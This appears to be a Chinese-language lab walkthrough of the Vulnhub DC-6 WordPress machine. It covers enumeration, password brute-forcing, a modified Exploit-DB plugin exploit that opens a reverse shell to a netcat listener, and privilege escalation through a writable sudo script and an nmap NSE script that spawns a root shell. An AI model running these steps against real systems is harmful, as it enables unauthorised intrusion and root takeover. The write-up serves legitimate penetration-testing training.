OSCP渗透靶场之Vulnhub-DC6
字数 1327 2025-08-10 23:41:58

Vulnhub-DC6 渗透测试实战教学文档

靶机概述

Vulnhub-DC6 是一个基于 WordPress 的渗透测试靶机,涉及多种渗透技术,包括:

  • WordPress 密码爆破
  • WPScan 扫描工具利用
  • WordPress 插件漏洞利用
  • 文件上传绕过系统登录
  • Nmap 自定义脚本提权

环境准备

  1. 下载靶机:https://www.vulnhub.com/entry/dc-6,315/
  2. 使用 VMware 打开靶机
  3. 确保攻击机与靶机在同一网络

信息收集

1. Nmap 扫描

nmap -sC -sV -p- -v -A 192.168.56.101

扫描结果:

  • 22/tcp: OpenSSH 7.4p1 Debian 10+deb9u6
  • 80/tcp: Apache httpd 2.4.25 (Debian)
    • WordPress 5.1.1
  • 41243/tcp: tcpwrapped

2. 主机名绑定

编辑 /etc/hosts 文件:

192.168.56.101 wordy

3. WPScan 扫描

wpscan --url http://wordy --enumerate

扫描发现两个有漏洞的插件:

  1. user-role-editor - 存在 WordPress 账号提权漏洞
  2. plainview-activity-monitor - 存在 RCE 漏洞

漏洞利用

1. WordPress 密码爆破

靶机提示:使用密码字典爆破 WordPress 账号

成功爆破出账号:

  • 用户名:mark
  • 密码:helpdesk01

2. 利用 plainview-activity-monitor 插件漏洞

  1. 在 Exploit-DB 搜索该插件漏洞(编号:45274)
  2. 下载 exp 文件(45274.html)
  3. 修改 exp 文件:
    • http://localhost:8000http://wordy
    • 127.0.0.1 → 攻击机 IP(如 192.168.56.102)
    • 移除 nc 的 -lvnp 参数
  4. 在攻击机开启监听: 
    nc -lvnp 9999
  5. 浏览器打开修改后的 45274.html,点击 "submit request"
  6. 成功获取反弹 shell

权限提升

1. 获取 graham 用户权限

  1. 在反弹的 shell 中查找 SSH 凭证
  2. 发现 graham 用户的密码
  3. 通过 SSH 登录: 
    ssh 192.168.56.101 -l graham

2. 获取 jens 用户权限

  1. 检查 graham 的 sudo 权限:

    sudo -l

    输出:

    User graham may run the following commands on dc-6:
    (jens) NOPASSWD: /home/jens/backups.sh

  2. 检查 /home/jens/backups.sh 文件权限:

    • graham 和 www-data 用户都有写权限

  3. 修改 backups.sh 文件:

    echo "/bin/bash" > /home/jens/backups.sh

  4. 执行脚本获取 jens 权限:

    sudo -u jens /home/jens/backups.sh

3. 获取 root 权限

  1. 检查 jens 的 sudo 权限:

    sudo -l

    输出:

    User jens may run the following commands on dc-6:
    (root) NOPASSWD: /usr/bin/nmap

  2. 创建 nmap 提权脚本:

    echo 'os.execute("/bin/bash")' > /tmp/shell.nse

  3. 使用 nmap 执行脚本提权:

    sudo /usr/bin/nmap --script=/tmp/shell.nse

    成功获取 root 权限

总结

本靶场涉及的关键技术点:

  1. 信息收集:Nmap 扫描、WPScan 扫描
  2. 漏洞利用:WordPress 密码爆破、插件漏洞利用
  3. 权限提升
    • 利用 sudo 权限执行脚本
    • 利用 nmap 的交互模式提权

学习要点:

  • WordPress 安全审计方法
  • 插件漏洞的识别与利用
  • Linux 权限提升技巧
  • 自动化工具与手动渗透的结合

建议进一步练习 Vulnhub 的 DC 系列其他靶机以巩固技能。

Vulnhub-DC6 渗透测试实战教学文档 靶机概述 Vulnhub-DC6 是一个基于 WordPress 的渗透测试靶机,涉及多种渗透技术,包括: WordPress 密码爆破 WPScan 扫描工具利用 WordPress 插件漏洞利用 文件上传绕过系统登录 Nmap 自定义脚本提权 环境准备 下载靶机:https://www.vulnhub.com/entry/dc-6,315/ 使用 VMware 打开靶机 确保攻击机与靶机在同一网络 信息收集 1. Nmap 扫描 扫描结果: 22/tcp: OpenSSH 7.4p1 Debian 10+deb9u6 80/tcp: Apache httpd 2.4.25 (Debian) WordPress 5.1.1 41243/tcp: tcpwrapped 2. 主机名绑定 编辑 /etc/hosts 文件: 3. WPScan 扫描 扫描发现两个有漏洞的插件: user-role-editor - 存在 WordPress 账号提权漏洞 plainview-activity-monitor - 存在 RCE 漏洞 漏洞利用 1. WordPress 密码爆破 靶机提示:使用密码字典爆破 WordPress 账号 成功爆破出账号: 用户名:mark 密码:helpdesk01 2. 利用 plainview-activity-monitor 插件漏洞 在 Exploit-DB 搜索该插件漏洞(编号:45274) 下载 exp 文件(45274.html) 修改 exp 文件: http://localhost:8000 → http://wordy 127.0.0.1 → 攻击机 IP(如 192.168.56.102) 移除 nc 的 -lvnp 参数 在攻击机开启监听: 浏览器打开修改后的 45274.html,点击 "submit request" 成功获取反弹 shell 权限提升 1. 获取 graham 用户权限 在反弹的 shell 中查找 SSH 凭证 发现 graham 用户的密码 通过 SSH 登录: 2. 获取 jens 用户权限 检查 graham 的 sudo 权限: 输出: 检查 /home/jens/backups.sh 文件权限: graham 和 www-data 用户都有写权限 修改 backups.sh 文件: 执行脚本获取 jens 权限: 3. 获取 root 权限 检查 jens 的 sudo 权限: 输出: 创建 nmap 提权脚本: 使用 nmap 执行脚本提权: 成功获取 root 权限 总结 本靶场涉及的关键技术点: 信息收集 :Nmap 扫描、WPScan 扫描 漏洞利用 :WordPress 密码爆破、插件漏洞利用 权限提升 : 利用 sudo 权限执行脚本 利用 nmap 的交互模式提权 学习要点: WordPress 安全审计方法 插件漏洞的识别与利用 Linux 权限提升技巧 自动化工具与手动渗透的结合 建议进一步练习 Vulnhub 的 DC 系列其他靶机以巩固技能。